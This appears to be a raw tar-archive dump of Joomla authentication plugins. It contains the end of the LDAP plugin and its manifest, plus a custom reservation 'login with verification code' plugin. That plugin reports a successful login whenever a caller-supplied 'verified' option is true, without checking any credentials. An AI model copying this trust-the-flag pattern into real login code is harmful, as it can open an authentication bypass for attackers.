$response->status = JAuthentication::STATUS_SUCCESS;
$response->error_message = '';
}
$ldap->close();
}
/**
* Shortcut method to build a LDAP search based on a semicolon separated
string
*
* Note that this method requires that semicolons which should be part of
the search term to be escaped
* to correctly split the search string into separate lookups
*
* @param string $search search string of search values
* @param LdapClient $ldap The LDAP client
*
* @return array Search results
*
* @since 3.8.2
*/
private function searchByString($search, LdapClient $ldap)
{
$results = explode(';', $search);
foreach ($results as $key => $result)
{
$results[$key] = '(' . str_replace('\3b',
';', $result) . ')';
}
return $ldap->search($results);
}
}
ldap/ldap.xml000064400000011017151157642600007135 0ustar00<?xml
version="1.0" encoding="utf-8"?>
<extension version="3.1" type="plugin"
group="authentication" method="upgrade">
<name>plg_authentication_ldap</name>
<author>Joomla! Project</author>
<creationDate>November 2005</creationDate>
<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights
reserved.</copyright>
<license>GNU General Public License version 2 or later; see
LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_LDAP_XML_DESCRIPTION</description>
<files>
<filename plugin="ldap">ldap.php</filename>
</files>
<languages>
<language
tag="en-GB">en-GB.plg_authentication_ldap.ini</language>
<language
tag="en-GB">en-GB.plg_authentication_ldap.sys.ini</language>
</languages>
<config>
<fields name="params">
<fieldset name="basic">
<field
name="host"
type="text"
label="PLG_LDAP_FIELD_HOST_LABEL"
description="PLG_LDAP_FIELD_HOST_DESC"
size="20"
/>
<field
name="port"
type="number"
label="PLG_LDAP_FIELD_PORT_LABEL"
description="PLG_LDAP_FIELD_PORT_DESC"
min="1"
max="65535"
default="389"
hint="389"
validate="number"
filter="integer"
size="5"
/>
<field
name="use_ldapV3"
type="radio"
label="PLG_LDAP_FIELD_V3_LABEL"
description="PLG_LDAP_FIELD_V3_DESC"
default="0"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="negotiate_tls"
type="radio"
label="PLG_LDAP_FIELD_NEGOCIATE_LABEL"
description="PLG_LDAP_FIELD_NEGOCIATE_DESC"
default="0"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="ignore_reqcert_tls"
type="radio"
label="PLG_LDAP_FIELD_IGNORE_REQCERT_TLS_LABEL"
description="PLG_LDAP_FIELD_IGNORE_REQCERT_TLS_DESC"
default="0"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="no_referrals"
type="radio"
label="PLG_LDAP_FIELD_REFERRALS_LABEL"
description="PLG_LDAP_FIELD_REFERRALS_DESC"
default="0"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="auth_method"
type="list"
label="PLG_LDAP_FIELD_AUTHMETHOD_LABEL"
description="PLG_LDAP_FIELD_AUTHMETHOD_DESC"
default="bind"
>
<option
value="search">PLG_LDAP_FIELD_VALUE_BINDSEARCH</option>
<option
value="bind">PLG_LDAP_FIELD_VALUE_BINDUSER</option>
</field>
<field
name="base_dn"
type="text"
label="PLG_LDAP_FIELD_BASEDN_LABEL"
description="PLG_LDAP_FIELD_BASEDN_DESC"
size="20"
/>
<field
name="search_string"
type="text"
label="PLG_LDAP_FIELD_SEARCHSTRING_LABEL"
description="PLG_LDAP_FIELD_SEARCHSTRING_DESC"
size="20"
/>
<field
name="users_dn"
type="text"
label="PLG_LDAP_FIELD_USERSDN_LABEL"
description="PLG_LDAP_FIELD_USERSDN_DESC"
size="20"
/>
<field
name="username"
type="text"
label="PLG_LDAP_FIELD_USERNAME_LABEL"
description="PLG_LDAP_FIELD_USERNAME_DESC"
size="20"
/>
<field
name="password"
type="password"
label="PLG_LDAP_FIELD_PASSWORD_LABEL"
description="PLG_LDAP_FIELD_PASSWORD_DESC"
size="20"
/>
<field
name="ldap_fullname"
type="text"
label="PLG_LDAP_FIELD_FULLNAME_LABEL"
description="PLG_LDAP_FIELD_FULLNAME_DESC"
default="fullName"
size="20"
/>
<field
name="ldap_email"
type="text"
label="PLG_LDAP_FIELD_EMAIL_LABEL"
description="PLG_LDAP_FIELD_EMAIL_DESC"
default="mail"
size="20"
/>
<field
name="ldap_uid"
type="text"
label="PLG_LDAP_FIELD_UID_LABEL"
description="PLG_LDAP_FIELD_UID_DESC"
default="uid"
size="20"
/>
<field
name="ldap_debug"
type="radio"
label="PLG_LDAP_FIELD_LDAPDEBUG_LABEL"
description="PLG_LDAP_FIELD_LDAPDEBUG_DESC"
default="0"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>
</fields>
</config>
</extension>
reservationloginwithverificationcode/index.html000064400000000054151157642600016273
0ustar00<html><body
bgcolor="#FFFFFF"></body></html>language/en-GB/en-GB.plg_authentication_reservationloginwithverificationcode.ini000064400000000660151157642600033752
0ustar00reservationloginwithverificationcodePLG_AUTHENTICATION_RESERVATIONLOGINWITHVERIFICATIONCODE="Authentication
- Reservationloginwithverificationcode"
PLG_AUTHENTICATION_RESERVATIONLOGINWITHVERIFICATIONCODE_XML_DESCRIPTION="<h1>Authentication
- Reservationloginwithverificationcode (v.1.0.0)</h1> <div
style='clear: both;'></div><p>Created by <a
href='http://farhad.com' target='_blank'>farhad
shahbazi</a><br /><small>Development started 27th
February,
2023</small></p>"language/en-GB/en-GB.plg_authentication_reservationloginwithverificationcode.sys.ini000064400000000660151157642600034567
0ustar00reservationloginwithverificationcodePLG_AUTHENTICATION_RESERVATIONLOGINWITHVERIFICATIONCODE="Authentication
- Reservationloginwithverificationcode"
PLG_AUTHENTICATION_RESERVATIONLOGINWITHVERIFICATIONCODE_XML_DESCRIPTION="<h1>Authentication
- Reservationloginwithverificationcode (v.1.0.0)</h1> <div
style='clear: both;'></div><p>Created by <a
href='http://farhad.com' target='_blank'>farhad
shahbazi</a><br /><small>Development started 27th
February,
2023</small></p>"reservationloginwithverificationcode/language/en-GB/index.html000064400000000054151157642600020746
0ustar00<html><body
bgcolor="#FFFFFF"></body></html>reservationloginwithverificationcode/language/index.html000064400000000054151157642600020056
0ustar00<html><body
bgcolor="#FFFFFF"></body></html>reservationloginwithverificationcode/reservationloginwithverificationcode.php000064400000003765151157642600024547
0ustar00<?php
/*----------------------------------------------------------------------------------|
www.vdm.io |----/
fdsh
/-------------------------------------------------------------------------------------------------------/
@version 1.0.36
@build 28th March, 2023
@created 17th December, 2020
@package Reservation
@subpackage reservationloginwithverificationcode.php
@author farhad shahbazi <http://farhad.com>
@copyright Copyright (C) 2015. All Rights Reserved
@license GNU/GPL Version 2 or later -
http://www.gnu.org/licenses/gpl-2.0.html
____ _____ _____ __ __ __ __ ___ _____ __ __ ____
_____ _ _ ____ _ _ ____
(_ _)( _ )( _ )( \/ )( ) /__\ / __)( _ )( \/ )( _ \(
_ )( \( )( ___)( \( )(_ _)
.-_)( )(_)( )(_)( ) ( )(__ /(__)\ ( (__ )(_)( ) ( )___/
)(_)( ) ( )__) ) ( )(
\____) (_____)(_____)(_/\/\_)(____)(__)(__) \___)(_____)(_/\/\_)(__)
(_____)(_)\_)(____)(_)\_) (__)
/------------------------------------------------------------------------------------------------------*/
// No direct access to this file
defined('_JEXEC') or die('Restricted access');
/***[JCBGUI.class_extends.head.1.$$$$]***/
use Joomla\CMS\Application\CMSApplication;
use Joomla\CMS\Plugin\CMSPlugin;
/***[/JCBGUI$$$$]***/
/***[JCBGUI.class_extends.comment.1.$$$$]***/
/**
* Authentication - Reservationloginwithverificationcode plugin.
*
* @package Reservationloginwithverificationcode
* @since 1.0.0
*//***[/JCBGUI$$$$]***/
class PlgAuthenticationReservationloginwithverificationcode extends
CMSPlugin
{
/***[JCBGUI.joomla_plugin.main_class_code.65.$$$$]***/
public function onUserAuthenticate($credentials, $options,
&$response)
{
$response->type = 'Joomla';
if(isset($options['verified']))
{
if($options['verified'])
{
$response->status = JAuthentication::STATUS_SUCCESS;
$response->error_message = '';
return;
}
}
}/***[/JCBGUI$$$$]***/
}
reservationloginwithverificationcode/reservationloginwithverificationcode.xml000064400000002216151157642600024546
0ustar00<?xml version="1.0" encoding="utf-8"?>
<extension type="plugin" version="3.8"
group="authentication" method="upgrade">
<name>PLG_AUTHENTICATION_RESERVATIONLOGINWITHVERIFICATIONCODE</name>
<creationDate>28th March, 2023</creationDate>
<author>farhad shahbazi</author>
<authorEmail>farhad.shahbazi0010@gmail.com</authorEmail>
<authorUrl>http://farhad.com</authorUrl>
<copyright>Copyright (C) 2015. All Rights Reserved</copyright>
<license>GNU/GPL Version 2 or later -
http://www.gnu.org/licenses/gpl-2.0.html</license>
<version>1.0.0</version>
<description>PLG_AUTHENTICATION_RESERVATIONLOGINWITHVERIFICATIONCODE_XML_DESCRIPTION</description>
<!-- Language files -->
<languages folder="language">
<language
tag="en-GB">en-GB/en-GB.plg_authentication_reservationloginwithverificationcode.ini</language>
<language
tag="en-GB">en-GB/en-GB.plg_authentication_reservationloginwithverificationcode.sys.ini</language>
</languages>
<!-- Plugin files -->
<files>
<filename
plugin="reservationloginwithverificationcode">reservationloginwithverificationcode.php</filename>
<filename>index.html</filename>
<folder>language</folder>
</files>
</extension>